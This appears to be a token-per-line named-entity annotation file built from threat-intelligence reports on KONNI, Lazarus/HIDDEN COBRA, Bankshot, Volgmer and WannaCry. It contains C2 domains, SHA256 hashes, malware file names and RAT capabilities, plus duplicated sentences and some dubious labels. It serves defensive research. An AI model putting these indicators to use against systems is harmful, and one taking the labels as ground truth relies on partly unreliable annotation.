+The O
+.dll S-FILE
+file O
+is O
+executed O
+by O
+the O
+.exe S-FILE
+file O
+. O
+
+In O
+this O
+version O
+, O
+a O
+shortcut O
+is O
+created O
+in O
+order O
+to O
+launch O
+winnit.exe S-FILE
+in O
+the O
+following O
+path O
+%USERPROFILE%\Start B-FILE
+Menu\Programs\Startup\Anti I-FILE
+virus I-FILE
+service.lnk E-FILE
+. O
+
+As O
+you O
+can O
+see O
+the O
+attacker O
+has O
+went O
+to O
+great O
+lengths O
+to O
+disguise O
+his O
+service O
+as O
+a O
+legitimate O
+Antivirus B-TOOL
+Service E-TOOL
+by O
+using O
+the O
+name O
+'Anti B-FILE
+virus I-FILE
+service.lnk' E-FILE
+. O
+
+This O
+is O
+of O
+course O
+simple O
+but O
+often O
+it O
+can O
+be O
+enough O
+for O
+a O
+user O
+to O
+miss O
+something O
+malicious O
+by O
+name O
+. O
+
+As O
+in O
+the O
+previous O
+version O
+, O
+the O
+ID O
+of O
+the O
+infected O
+system O
+is O
+generated O
+with O
+exactly O
+the O
+same O
+method O
+. O
+
+The O
+C2 S-TOOL
+is O
+different O
+and O
+the O
+analysed O
+version O
+this O
+time O
+only O
+contains O
+a O
+single O
+domain: O
+dowhelsitjs.netau.net S-DOM
+. O
+
+In O
+this O
+version O
+, O
+the O
+developer O
+used O
+a O
+different O
+API O
+, O
+the O
+Wininet B-TOOL
+API E-TOOL
+which O
+make O
+more O
+sense O
+for O
+Web O
+requests O
+. O
+
+Moreover O
+the O
+C2 S-TOOL
+infrastructure O
+evolved O
+too O
+, O
+more O
+.php  S-FILE
+files O
+are O
+available O
+through O
+the O
+web O
+hosting: O
+<c2-domain>/login.php S-FILE
+<c2-domain>/upload.php S-FILE
+<c2-domain>/download.php S-FILE
+. O
+
+This O
+version O
+includes O
+the O
+stealer O
+features O
+mentioned O
+in O
+the O
+previous O
+version O
+and O
+additionally O
+Remote B-TOOL
+Administration I-TOOL
+Tool E-TOOL
+features O
+such O
+as O
+file O
+uploading/download O
+and O
+arbitrary O
+command O
+execution O
+. O
+
+The O
+library O
+is O
+only O
+used O
+to O
+perform O
+keylogging O
+and O
+clipboard O
+stealing O
+. O
+
+Indeed O
+, O
+the O
+malware O
+author O
+moved O
+this O
+part O
+of O
+the O
+code O
+from O
+the O
+core O
+of O
+the O
+malware O
+to O
+a O
+library O
+. O
+
+An O
+interesting O
+element O
+is O
+that O
+the O
+malware O
+looks O
+for O
+filenames O
+created O
+with O
+the O
+previous O
+version O
+of O
+KONNI S-MAL
+. O
+
+This O
+implies O
+that O
+the O
+malware O
+targeted O
+the O
+same O
+people O
+as O
+the O
+previous O
+version O
+and O
+they O
+are O
+designed O
+to O
+work O
+together O
+. O
+
+The O
+malware O
+internally O
+uses O
+the O
+following O
+files O
+: O
+solhelp.ocx S-FILE
+sultry.ocx S-FILE
+helpsol.ocx S-FILE
+psltre.ocx S-FILE
+screentmp.tmp S-FILE
+(log O
+file O
+of O
+the O
+keylogger) O
+spadmgr.ocx S-FILE
+apsmgrd.ocx S-FILE
+wpg.db S-FILE
+. O
+
+In O
+this O
+campaign O
+, O
+the O
+malware O
+author O
+uses O
+the O
+following O
+name: O
+Pyongyang B-ACT
+Directory I-ACT
+Group I-ACT
+email E-ACT
+April B-TIME
+2017 E-TIME
+RC_Office_Coordination_Associate.scr. S-FILE
+The O
+decoy O
+document O
+shown O
+after O
+infection O
+is O
+an O
+Office S-TOOL
+document O
+containing O
+email S-TOOL
+addresses O
+, O
+phone O
+numbers O
+and O
+contacts O
+of O
+members O
+of O
+official B-IDTY
+organizations E-IDTY
+such O
+as O
+the O
+United B-IDTY
+Nations E-IDTY
+, O
+UNICEF S-IDTY
+, O
+Embassies S-IDTY
+linked O
+to O
+North B-LOC
+Korea E-LOC
+. O
+
+The O
+.scr S-FILE
+files O
+drops O
+two O
+files: O
+an O
+executable O
+and O
+a O
+library O
+. O
+
+As O
+in O
+the O
+previous O
+version O
+, O
+the O
+persistence O
+is O
+achieved O
+by O
+a O
+Windows S-OS
+shortcut O
+(in O
+this O
+case O
+adobe O
+distillist.lnk S-FILE
+) O
+. O
+
+Contrary O
+to O
+the O
+previous O
+version O
+, O
+the O
+developers O
+moved O
+the O
+core O
+of O
+malware O
+to O
+the O
+library O
+. O
+
+The O
+executable O
+performs O
+the O
+following O
+tasks: O
+If O
+the O
+system O
+is O
+a O
+64-bit O
+version O
+of O
+Windows S-OS
+, O
+it O
+downloads O
+and O
+executes O
+a O
+specific O
+64-bit O
+version O
+of O
+the O
+malware O
+thanks O
+to O
+a O
+powershell S-TOOL
+script O
+. O
+
+Loading O
+the O
+dropped O
+library O
+. O
+
+The O
+library O
+contains O
+the O
+same O
+features O
+as O
+the O
+previous O
+version O
+as O
+well O
+as O
+new O
+ones O
+. O
+
+This O
+version O
+of O
+KONNI S-MAL
+is O
+the O
+most O
+advanced O
+with O
+better O
+coding O
+. O
+
+The O
+malware O
+configuration O
+contains O
+one O
+Command O
+and O
+Control: O
+pactchfilepacks.net23.net S-DOM
+. O
+
+A O
+new O
+URI O
+is O
+available: O
+<c2-domain>/uploadtm.php S-DOM
+. O
+
+This O
+URI O
+is O
+used O
+with O
+a O
+new O
+feature O
+implemented O
+in O
+this O
+version: O
+the O
+malware O
+is O
+able O
+to O
+perform O
+screenshot O
+(thanks O
+to O
+the O
+GDI O
+API) O
+and O
+uploads O
+it O
+thank O
+to O
+this O
+URL O
+. O
+
+The O
+malware O
+checks O
+if O
+a O
+file O
+used O
+on O
+a O
+previous O
+version O
+of O
+KONNI S-MAL
+is O
+available O
+on O
+the O
+system O
+. O
+
+Here O
+is O
+the O
+complete O
+list O
+of O
+files O
+internally O
+used O
+by O
+the O
+RAT: O
+error.tmp S-FILE
+(the O
+log O
+file O
+of O
+the O
+keylogger) O
+tedsul.ocx S-FILE
+helpsol.ocx S-FILE
+trepsl.ocx S-FILE
+psltred.ocx S-FILE
+solhelp.ocx S-FILE
+sulted.ocx S-FILE
+. O
+
+The O
+handling O
+of O
+instructions O
+has O
+improved O
+too O
+. O
+
+Here O
+are O
+the O
+7 O
+actions O
+that O
+the O
+infected O
+machine O
+can O
+be O
+instructed O
+to O
+perform: O
+Delete O
+a O
+specific O
+file O
+. O
+
+Upload O
+a O
+specific O
+file O
+based O
+on O
+a O
+filename O
+. O
+
+Upload O
+a O
+specific O
+file O
+based O
+on O
+the O
+full O
+path O
+name O
+. O
+
+Create O
+a O
+screenshot O
+and O
+uploads O
+it O
+on O
+the O
+C2 S-TOOL
+. O
+
+Get O
+system O
+information O
+. O
+
+Download O
+a O
+file O
+from O
+the O
+Internet O
+. O
+
+Execute O
+a O
+command O
+. O
+
+When O
+the O
+attacker O
+wants O
+to O
+gather O
+information O
+on O
+the O
+infected O
+system O
+(action O
+5) O
+, O
+it O
+retrieves O
+the O
+following O
+information: O
+Hostname O
+IP O
+address O
+Computer O
+name O
+Username O
+name O
+Connected O
+drive O
+OS O
+version O
+Architecture O
+Start O
+menu O
+programs O
+Installed O
+software O
+. O
+
+The O
+last O
+identified O
+campaign O
+where O
+KONNI S-MAL
+was O
+used O
+was O
+named O
+Inter B-ACT
+Agency I-ACT
+List I-ACT
+and I-ACT
+Phonebook E-ACT
+- O
+April B-TIME
+2017 E-TIME
+RC_Office_Coordination_Associate.scr S-FILE
+. O
+
+This O
+file O
+drops O
+exactly O
+the O
+same O
+files O
+than O
+the O
+previous O
+campaign O
+but O
+the O
+decoy O
+document O
+is O
+different O
+. O
+
+This O
+document O
+contains O
+the O
+name O
+, O
+phone O
+number O
+and O
+email S-TOOL
+address O
+of O
+members O
+of O
+agencies O
+, O
+embassies O
+and O
+organizations O
+linked O
+to O
+North B-LOC
+Korea E-LOC
+. O
+
+The O
+analysis O
+shows O
+us O
+the O
+evolution O
+of O
+KONNI S-MAL
+over O
+the O
+last O
+3 O
+years O
+. O
+
+The O
+last O
+campaign O
+was O
+started O
+a O
+few O
+days O
+ago O
+and O
+is O
+still O
+active O
+. O
+
+The O
+infrastructure O
+remains O
+up O
+and O
+running O
+at O
+the O
+time O
+of O
+this O
+post O
+. O
+
+The O
+RAT O
+has O
+remained O
+under O
+the O
+Radar S-TOOL
+for O
+multiple O
+years O
+. O
+
+An O
+explanation O
+could O
+be O
+the O
+fact O
+that O
+the O
+campaign O
+was O
+very O
+limited O
+nature O
+, O
+which O
+does O
+not O
+arouse O
+suspicion O
+. O
+
+This O
+investigation O
+shows O
+that O
+the O
+author O
+has O
+evolved O
+technically O
+(by O
+implementing O
+new O
+features) O
+and O
+in O
+the O
+quality O
+of O
+the O
+decoy O
+documents O
+. O
+
+The O
+campaign O
+of O
+April B-TIME
+2017 E-TIME
+used O
+pertinent O
+documents O
+containing O
+potentially O
+sensitive O
+data O
+. O
+
+Moreover O
+the O
+metadata O
+of O
+the O
+Office S-TOOL
+document O
+contains O
+the O
+names O
+of O
+people O
+who O
+seems O
+to O
+work O
+for O
+a O
+public O
+organization O
+. O
+
+We O
+don't O
+know O
+if O
+the O
+document O
+is O
+a O
+legitimate O
+compromised O
+document O
+or O
+a O
+fake O
+that O
+the O
+attacker O
+has O
+created O
+in O
+an O
+effort O
+to O
+be O
+credible O
+. O
+
+Clearly O
+the O
+author O
+has O
+a O
+real O
+interest O
+in O
+North B-LOC
+Korea E-LOC
+, O
+with O
+3 O
+of O
+the O
+4 O
+campaigns O
+are O
+linked O
+to O
+North B-LOC
+Korea E-LOC
+. O
+
+Additional O
+ways O
+our O
+customers O
+can O
+detect O
+and O
+block O
+this O
+threat O
+are O
+listed O
+below O
+. O
+
+Advanced B-TOOL
+Malware I-TOOL
+Protection E-TOOL
+( O
+AMP S-TOOL
+) O
+is O
+ideally O
+suited O
+to O
+prevent O
+the O
+execution O
+of O
+the O
+malware O
+used O
+by O
+these O
+threat O
+actors O
+. O
+
+CWS S-TOOL
+or O
+WSA S-TOOL
+web O
+scanning O
+prevents O
+access O
+to O
+malicious O
+websites O
+and O
+detects O
+malware O
+used O
+in O
+these O
+attacks O
+. O
+
+Email B-TOOL
+Security E-TOOL
+can O
+block O
+malicious O
+emails S-TOOL
+sent O
+by O
+threat O
+actors O
+as O
+part O
+of O
+their O
+campaign O
+. O
+
+The O
+Network B-SECTEAM
+Security E-SECTEAM
+protection O
+of O
+IPS S-TOOL
+and O
+NGFW S-TOOL
+have O
+up-to-date O
+signatures O
+to O
+detect O
+malicious O
+network O
+activity O
+by O
+threat O
+actors O
+. O
+
+AMP B-SECTEAM
+Threat I-SECTEAM
+Grid E-SECTEAM
+helps O
+identify O
+malicious O
+binaries O
+and O
+build O
+protection O
+into O
+all O
+Cisco B-SECTEAM
+Security E-SECTEAM
+products O
+. O
+
+Umbrella S-SECTEAM
+, O
+our O
+secure O
+internet O
+gateway O
+(SIG) O
+, O
+blocks O
+users O
+from O
+connecting O
+to O
+malicious O
+domains O
+, O
+IPs O
+, O
+and O
+URLs O
+, O
+whether O
+users O
+are O
+on O
+or O
+off O
+the O
+corporate O
+network O
+. O
+
+SHA256 S-ENCR
+: O
+413772d81e4532fec5119e9dce5e2bf90b7538be33066cf9a6ff796254a5225f S-SHA2
+. O
+
+Filename: O
+beauty.scr S-FILE
+. O
+
+SHA256 S-ENCR
+: O
+eb90e40fc4d91dec68e8509056c52e9c8ed4e392c4ac979518f8d87c31e2b435 S-SHA2
+. O
+
+Filename: O
+C:\Windows\beauty.jpg S-FILE
+. O
+
+File O
+type: O
+JPEG O
+image O
+data O
+, O
+JFIF O
+standard O
+1.02 O
+. O
+
+SHA256 S-ENCR
+: O
+44150350727e2a42f66d50015e98de462d362af8a9ae33d1f5124f1703179ab9 S-SHA2
+. O
+
+Hilename: O
+C:\Windows\svchost.exe S-FILE
+. O
+
+File O
+type: O
+PE32 O
+executable O
+(GUI) O
+Intel O
+80386 O
+, O
+for O
+MS B-IDTY
+Windows E-IDTY
+. O
+
+phpschboy.prohosts.org S-DOM
+. O
+
+jams481.site.bz S-DOM
+. O
+
+SHA256 S-ENCR
+: O
+94113c9968db13e3412c1b9c1c882592481c559c0613dbccfed2fcfc80e77dc5 S-SHA2
+. O
+
+Filename: O
+How B-FILE
+can I-FILE
+North I-FILE
+Korean I-FILE
+hydrogen I-FILE
+bomb I-FILE
+wipe I-FILE
+out I-FILE
+Manhattan.scr E-FILE
+. O
+
+SHA256 S-ENCR
+: O
+56f159cde3a55ae6e9270d95791ef2f6859aa119ad516c9471010302e1fb5634 S-SHA2
+. O
+
+Filename: O
+conhote.dll S-FILE
+. O
+
+SHA256 S-ENCR
+: O
+553a475f72819b295927e469c7bf9aef774783f3ae8c34c794f35702023317cc S-SHA2
+. O
+
+Filename: O
+winnit.exe S-FILE
+. O
+
+SHA256 S-ENCR
+: O
+92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f S-SHA2
+. O
+
+Filename: O
+Anti B-FILE
+virus I-FILE
+service.lnk E-FILE
+. O
+dowhelsitjs.netau.net S-DOM
+. O
+
+SHA256 S-ENCR
+: O
+69a9d7aa0cb964c091ca128735b6e60fa7ce028a2ba41d99023dd57c06600fe0 S-SHA2
+. O
+
+Filename: O
+Pyongyang B-FILE
+Directory I-FILE
+Group I-FILE
+email I-FILE
+April I-FILE
+2017.RC_Office_Coordination_Associate.scr E-FILE
+. O
+
+SHA256 S-ENCR
+: O
+4585584fe7e14838858b24c18a792b105d18f87d2711c060f09e62d89fc3085b S-SHA2
+. O
+
+Filename: O
+adobe B-FILE
+distillist.lnk E-FILE
+. O
+
+SHA256 S-ENCR
+: O
+39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 S-SHA2
+. O
+
+Filename: O
+winload.exe S-FILE
+. O
+
+SHA256 S-ENCR
+: O
+dd730cc8fcbb979eb366915397b8535ce3b6cfdb01be2235797d9783661fc84d S-SHA2
+. O
+
+Filename: O
+winload.dll S-FILE
+. O
+
+Pactchfilepacks.net23.net S-DOM
+. O
+checkmail.phpnet.us S-DOM
+. O
+
+Lazarus S-APT
+used O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+to O
+compromise O
+legitimate O
+and O
+trusted O
+websites O
+frequently O
+visited O
+by O
+their O
+targets O
+. O
+
+Malefactors S-APT
+used O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+to O
+compromise O
+legitimate O
+and O
+trusted O
+websites O
+frequently O
+visited O
+by O
+their O
+targets O
+. O
+
+Feedback O
+from O
+our O
+Smart B-SECTEAM
+Protection I-SECTEAM
+Network E-SECTEAM
+revealed O
+that O
+apart O
+from O
+attacks O
+in O
+North B-LOC
+America E-LOC
+( O
+mainly O
+the O
+U.S. S-LOC
+) O
+, O
+Europe S-LOC
+, O
+and O
+South B-LOC
+America E-LOC
+, O
+the O
+campaign O
+also O
+noticeably O
+affected O
+enterprises S-IDTY
+in O
+Taiwan S-LOC
+, O
+Hong B-LOC
+Kong E-LOC
+, O
+China S-LOC
+, O
+and O
+Bahrain S-LOC
+. O
+
+On O
+February B-TIME
+28 E-TIME
+, O
+the O
+McAfee S-SECTEAM
+discovered O
+that O
+the O
+cybercrime O
+group O
+HIDDEN B-APT
+COBRA E-APT
+continues O
+to O
+target O
+cryptocurrency S-IDTY
+and O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+On O
+February B-TIME
+28 E-TIME
+, O
+the O
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+discovered O
+that O
+the O
+cybercrime O
+group O
+HIDDEN B-APT
+COBRA E-APT
+continues O
+to O
+target O
+cryptocurrency S-IDTY
+and O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+While O
+the O
+URL O
+acts O
+similarly O
+to O
+how O
+eye-watch.in O
+: O
+443 O
+delivers O
+payloads O
+, O
+we O
+also O
+saw O
+the O
+URL O
+leveraging O
+and O
+exploiting O
+security O
+flaws O
+in O
+Flash S-TOOL
+: O
+CVE-2015-8651 S-VULID
+, O
+CVE-2016-1019 S-VULID
+, O
+and O
+CVE-2016-4117 S-VULID
+. O
+
+In O
+this O
+analysis O
+, O
+we O
+observed O
+the O
+return O
+of O
+HIDDEN B-APT
+COBRA E-APT
+'s O
+Bankshot S-MAL
+malware S-MAL
+implant O
+surfacing O
+in O
+the O
+Turkish S-LOC
+financial O
+system O
+. O
+
+In O
+this O
+new O
+, O
+aggressive O
+campaign O
+we O
+see O
+a O
+return O
+of O
+the O
+Bankshot S-MAL
+implant O
+, O
+which O
+last O
+appeared O
+in O
+2017 S-TIME
+. O
+
+This O
+attack O
+resembles O
+previous O
+attacks O
+by O
+HIDDEN B-APT
+COBRA E-APT
+conducted O
+against O
+the O
+SWIFT O
+. O
+
+The O
+exploit S-VULNAME
+, O
+which O
+takes O
+advantage O
+of O
+CVE-2018-4878 S-VULID
+, O
+allows O
+an O
+attacker S-APT
+to O
+execute O
+arbitrary O
+code O
+such O
+as O
+an O
+implant O
+. O
+
+These O
+implants O
+are O
+variations O
+of O
+earlier O
+forms O
+of O
+Bankshot S-MAL
+, O
+a O
+remote O
+access O
+tool O
+that O
+gives O
+an O
+attacker S-APT
+full O
+capability O
+on O
+a O
+victim O
+'s O
+system O
+. O
+
+Bankshot S-MAL
+was O
+first O
+reported O
+by O
+the O
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+on O
+December B-TIME
+13 I-TIME
+, I-TIME
+2017 E-TIME
+, O
+and O
+has O
+only O
+recently O
+resurfaced O
+in O
+newly O
+compiled O
+variants O
+. O
+
+We O
+have O
+found O
+what O
+may O
+be O
+an O
+early O
+data-gathering O
+stage O
+for O
+future O
+possible O
+heists O
+from O
+financial B-IDTY
+organizations E-IDTY
+in O
+Turkey S-LOC
+( O
+and O
+possibly O
+other O
+countries O
+) O
+. O
+
+Documents S-FILE
+with O
+the O
+flash S-TOOL
+exploit S-VULNAME
+managed O
+to O
+evade O
+static O
+defenses O
+and O
+remain O
+undetected O
+as O
+an O
+exploit S-VULNAME
+on O
+VirusTotal S-TOOL
+. O
+
+This O
+malware O
+report O
+contains O
+analysis O
+of O
+one O
+32-bit B-FILE
+Windows I-FILE
+executable I-FILE
+file E-FILE
+, O
+identified O
+as O
+a O
+Remote B-MAL
+Access I-MAL
+Trojan E-MAL
+( O
+RAT S-MAL
+) O
+. O
+
+This O
+malware O
+is O
+capable O
+of O
+accessing O
+device O
+configuration O
+data O
+, O
+downloading O
+additional O
+files O
+, O
+executing O
+commands O
+, O
+modifying O
+the O
+registry O
+, O
+capturing O
+screen O
+shots O
+, O
+and O
+exfiltrating O
+data O
+. O
+
+Volgmer S-MAL
+is O
+a O
+backdoor B-MAL
+Trojan E-MAL
+designed O
+to O
+provide O
+covert O
+access O
+to O
+a O
+compromised O
+system O
+. O
+
+It O
+is O
+suspected O
+that O
+spear B-ACT
+phishing E-ACT
+is O
+the O
+primary O
+delivery O
+mechanism O
+for O
+Volgmer S-MAL
+infections O
+; O
+however O
+, O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+use O
+a O
+suite O
+of O
+custom B-MAL
+tools E-MAL
+, O
+some O
+of O
+which O
+could O
+also O
+be O
+used O
+to O
+initially O
+compromise O
+a O
+system O
+. O
+
+Since O
+at O
+least O
+2013 S-TIME
+, O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+have O
+been O
+observed O
+using O
+Volgmer S-MAL
+malware S-MAL
+in O
+the O
+wild O
+to O
+target O
+the O
+government S-IDTY
+, O
+financial S-IDTY
+, O
+automotive S-IDTY
+, O
+and O
+media B-IDTY
+industries E-IDTY
+. O
+
+Therefore O
+, O
+it O
+is O
+possible O
+that O
+additional O
+HIDDEN B-MAL
+COBRA I-MAL
+malware E-MAL
+may O
+be O
+present O
+on O
+network B-ACT
+infrastructure E-ACT
+compromised O
+with O
+Volgmer S-MAL
+. O
+
+As O
+a O
+backdoor B-MAL
+Trojan E-MAL
+, O
+Volgmer S-MAL
+has O
+several O
+capabilities O
+including O
+: O
+gathering O
+system O
+information O
+, O
+updating O
+service O
+registry O
+keys O
+, O
+downloading O
+and O
+uploading O
+files O
+, O
+executing O
+commands O
+, O
+terminating O
+processes O
+, O
+and O
+listing O
+directories O
+. O
+
+In O
+one O
+of O
+the O
+samples O
+received O
+for O
+analysis O
+, O
+the O
+US-CERT B-SECTEAM
+Code I-SECTEAM
+Analysis I-SECTEAM
+Team E-SECTEAM
+observed O
+botnet B-FILE
+controller E-FILE
+functionality O
+. O
+
+Volgmer S-MAL
+payloads O
+have O
+been O
+observed O
+in O
+32-bit O
+form O
+as O
+either O
+executables O
+or O
+dynamic-link B-TOOL
+library E-TOOL
+( O
+.dll S-FILE
+) O
+
+
+Lazarus B-APT
+actors E-APT
+commonly O
+maintain O
+persistence O
+on O
+a O
+victim O
+'s O
+system O
+by O
+installing O
+the O
+malware-as-a-service S-ACT
+. O
+
+Working O
+with O
+U.S. B-IDTY
+Government E-IDTY
+partners O
+, O
+DHS S-SECTEAM
+and O
+FBI S-SECTEAM
+identified O
+Trojan S-MAL
+malware S-MAL
+variants O
+used O
+by O
+the O
+North B-LOC
+Korean E-LOC
+government O
+- O
+referred O
+to O
+by O
+the O
+U.S. B-IDTY
+Government E-IDTY
+as O
+BADCALL O
+. O
+
+The O
+malware O
+uses O
+a O
+custom B-MAL
+binary I-MAL
+protocol E-MAL
+to O
+beacon S-MAL
+back O
+to O
+the O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+server O
+, O
+often O
+via O
+TCP S-PROT
+PROT O
+8080 O
+or O
+8088 O
+, O
+with O
+some O
+payloads O
+implementing O
+Secure B-PROT
+Socket I-PROT
+Layer E-PROT
+( O
+SSL S-PROT
+) O
+encryption O
+to O
+obfuscate O
+communications S-IDTY
+. O
+
+DHS S-SECTEAM
+and O
+FBI S-SECTEAM
+are O
+distributing O
+this O
+MAR O
+to O
+enable O
+network O
+defense O
+and O
+reduce O
+exposure O
+to O
+North B-LOC
+Korean E-LOC
+government O
+malicious B-ACT
+cyber I-ACT
+activity E-ACT
+. O
+
+The O
+malware O
+known O
+as O
+RATANKBA S-MAL
+is O
+just O
+one O
+of O
+the O
+weapons O
+in O
+Lazarus S-APT
+' O
+arsenal O
+. O
+
+We O
+analyzed O
+a O
+new O
+RATANKBA S-MAL
+variant O
+( O
+BKDR_RATANKBA.ZAEL–A S-MAL
+) O
+, O
+discovered O
+in O
+June B-TIME
+2017 E-TIME
+, O
+that O
+uses O
+a O
+PowerShell B-MAL
+script E-MAL
+instead O
+of O
+its O
+more O
+traditional O
+PE O
+executable O
+form—a O
+version O
+that O
+other O
+researchers O
+also O
+recently O
+identified O
+. O
+
+Around O
+55% O
+of O
+the O
+victims O
+of O
+Lazarus S-APT
+were O
+located O
+in O
+India S-LOC
+and O
+neighboring O
+countries O
+. O
+
+Lazarus B-APT
+group E-APT
+could O
+have O
+been O
+active O
+since O
+late B-TIME
+2016 E-TIME
+, O
+was O
+used O
+in O
+a O
+recent O
+campaign O
+targeting O
+financial B-IDTY
+institutions E-IDTY
+using O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+. O
+
+Since O
+they O
+first O
+emerged O
+back O
+in O
+2007 S-TIME
+with O
+a O
+series O
+of O
+cyberespionage B-ACT
+attacks E-ACT
+against O
+the O
+South B-LOC
+Korean E-LOC
+government S-IDTY
+, O
+these O
+threat O
+actors S-APT
+have O
+successfully O
+managed O
+to O
+pull O
+off O
+some O
+of O
+the O
+most O
+notable O
+and O
+devastating O
+targeted O
+attacks—such O
+as O
+the O
+widely-reported O
+2014 S-TIME
+Sony O
+hack O
+and O
+the O
+2016 B-ACT
+attack E-ACT
+on O
+a O
+Bangladeshi S-LOC
+bank—in O
+recent O
+history O
+. O
+
+It O
+'s O
+possible O
+that O
+Lazarus S-APT
+is O
+using O
+RATANKBA S-MAL
+to O
+target O
+larger O
+organizations O
+. O
+
+RATANKBA S-MAL
+is O
+delivered O
+to O
+its O
+victims O
+using O
+a O
+variety O
+of O
+lure O
+documents O
+, O
+including O
+Microsoft B-MAL
+Office I-MAL
+documents E-MAL
+, O
+malicious O
+CHM B-MAL
+files E-MAL
+, O
+and O
+different O
+script O
+downloaders O
+. O
+
+Overall O
+, O
+an O
+organization O
+will O
+need O
+multilayered O
+security O
+strategies O
+, O
+as O
+Lazarus S-APT
+and O
+other O
+similar O
+groups S-APT
+are O
+experienced O
+cybercriminals S-APT
+who O
+employ O
+different O
+strategies O
+to O
+get O
+past O
+organizational O
+defenses O
+. O
+
+simultaneous O
+use O
+of O
+the O
+detected O
+Win32/KillDisk.NBO S-MAL
+variants O
+. O
+
+Working O
+with O
+U.S. B-IDTY
+Government E-IDTY
+partners O
+, O
+DHS S-SECTEAM
+and O
+FBI S-SECTEAM
+identified O
+Trojan S-MAL
+malware S-MAL
+variants O
+used O
+by O
+the O
+North B-LOC
+Korean E-LOC
+government O
+– O
+commonly O
+known O
+as O
+HARDRAIN S-MAL
+. O
+
+These O
+files O
+have O
+the O
+capability O
+to O
+download O
+and O
+install O
+malware O
+, O
+install O
+proxy O
+and O
+Remote O
+Access O
+Trojans O
+( O
+RATs S-MAL
+) O
+, O
+connect O
+to O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+servers O
+to O
+receive O
+additional O
+instructions O
+, O
+and O
+modify O
+the O
+victim O
+'s O
+firewall O
+to O
+allow O
+incoming O
+connections O
+. O
+
+The O
+cybercriminal O
+group O
+Lazarus S-APT
+has O
+a O
+history O
+of O
+attacking O
+financial B-IDTY
+organizations E-IDTY
+in O
+Asia S-LOC
+and O
+Latin B-LOC
+America E-LOC
+. O
+
+We O
+also O
+recently O
+discovered O
+that O
+Lazarus S-APT
+successfully O
+planted O
+their O
+backdoor O
+( O
+detected O
+by O
+Trend B-SECTEAM
+Micro E-SECTEAM
+as O
+BKDR_BINLODR.ZNFJ-A S-MAL
+) O
+into O
+several O
+machines O
+of O
+financial B-IDTY
+institutions E-IDTY
+across O
+Latin B-LOC
+America E-LOC
+. O
+
+We O
+determined O
+that O
+these O
+backdoors O
+were O
+installed O
+on O
+the O
+targets O
+' O
+machines O
+on O
+September B-TIME
+19 I-TIME
+2018 E-TIME
+, O
+based O
+mainly O
+on O
+the O
+service O
+creation O
+time O
+of O
+the O
+loader O
+component O
+. O
+
+Just O
+last O
+week O
+Lazarus S-APT
+were O
+found O
+stealing O
+millions O
+from O
+ATMs O
+across O
+Asia S-LOC
+and O
+Africa S-LOC
+. O
+
+These O
+and O
+other O
+tools O
+used O
+by O
+the O
+Lazarus B-APT
+group E-APT
+can O
+be O
+mitigated O
+by O
+routinely O
+scanning O
+the O
+network O
+for O
+any O
+malicious B-ACT
+activity E-ACT
+to O
+help O
+prevent O
+the O
+malware O
+from O
+entering O
+and O
+spreading O
+through O
+an O
+organization O
+. O
+
+The O
+backdoors O
+Lazarus S-APT
+are O
+deploying O
+are O
+difficult O
+to O
+detect O
+and O
+a O
+significant O
+threat O
+to O
+the O
+privacy O
+and O
+security O
+of O
+enterprises S-IDTY
+, O
+allowing O
+attackers S-APT
+to O
+steal O
+information O
+, O
+delete O
+files O
+, O
+install O
+malware O
+, O
+and O
+more O
+. O
+
+Trend B-SECTEAM
+Micro E-SECTEAM
+endpoint O
+solutions O
+such O
+as O
+Trend B-SECTEAM
+Micro™ I-SECTEAM
+Smart I-SECTEAM
+Protection I-SECTEAM
+Suites E-SECTEAM
+and O
+Worry-Free™ B-SECTEAM
+Business I-SECTEAM
+Security E-SECTEAM
+can O
+protect O
+users O
+and O
+businesses S-IDTY
+from O
+these O
+threats O
+by O
+detecting O
+malicious B-FILE
+files E-FILE
+and O
+spammed O
+messages O
+as O
+well O
+as O
+blocking O
+all O
+related O
+malicious O
+URLs O
+. O
+
+FBI S-SECTEAM
+has O
+high O
+confidence O
+that O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+are O
+using O
+malware O
+variants O
+in O
+conjunction O
+with O
+proxy O
+servers O
+to O
+maintain O
+a O
+presence O
+on O
+victim O
+networks O
+and O
+to O
+further O
+network O
+exploitation O
+. O
+
+Ransomware O
+that O
+has O
+been O
+publicly O
+named O
+" O
+WannaCry S-MAL
+" O
+, O
+" O
+WCry S-MAL
+" O
+or O
+" O
+WanaCrypt0r S-MAL
+" O
+( O
+based O
+on O
+strings O
+in O
+the O
+binary O
+and O
+encrypted O
+files O
+) O
+has O
+spread O
+to O
+at O
+least O
+74 O
+countries O
+as O
+of O
+Friday B-TIME
+12 I-TIME
+May I-TIME
+2017 E-TIME
+, O
+reportedly O
+targeting O
+Russia S-LOC
+initially O
+, O
+and O
+spreading O
+to O
+telecommunications S-IDTY
+, O
+shipping S-IDTY
+, O
+car B-IDTY
+manufacturers E-IDTY
+, O
+universities S-IDTY
+and O
+health B-IDTY
+care I-IDTY
+industries E-IDTY
+, O
+among O
+others O
+. O
+
+Ransomware O
+that O
+has O
+been O
+publicly O
+named O
+" O
+WannaCry S-MAL
+" O
+, O
+" O
+WCry S-MAL
+" O
+or O
+" O
+WanaCrypt0r S-MAL
+" O
+( O
+based O
+on O
+strings O
+in O
+the O
+binary O
+and O
+encrypted O
+files O
+) O
+has O
+spread O
+to O
+at O
+least O
+74 O
+countries O
+as O
+of O
+Friday B-TIME
+12 I-TIME
+May I-TIME
+2017 E-TIME
+, O
+reportedly O
+targeting O
+Russia S-LOC
+initially O
+, O
+and O
+spreading O
+to O
+telecommunications S-IDTY
+, O
+shipping S-IDTY
+, O
+car B-IDTY
+manufacturers E-IDTY
+, O
+universities S-IDTY
+and O
+health B-IDTY
+care I-IDTY
+industries E-IDTY
+, O
+among O
+others O
+. O
+
+We O
+also O
+saw O
+that O
+the O
+attack O
+technique O
+bears O
+some O
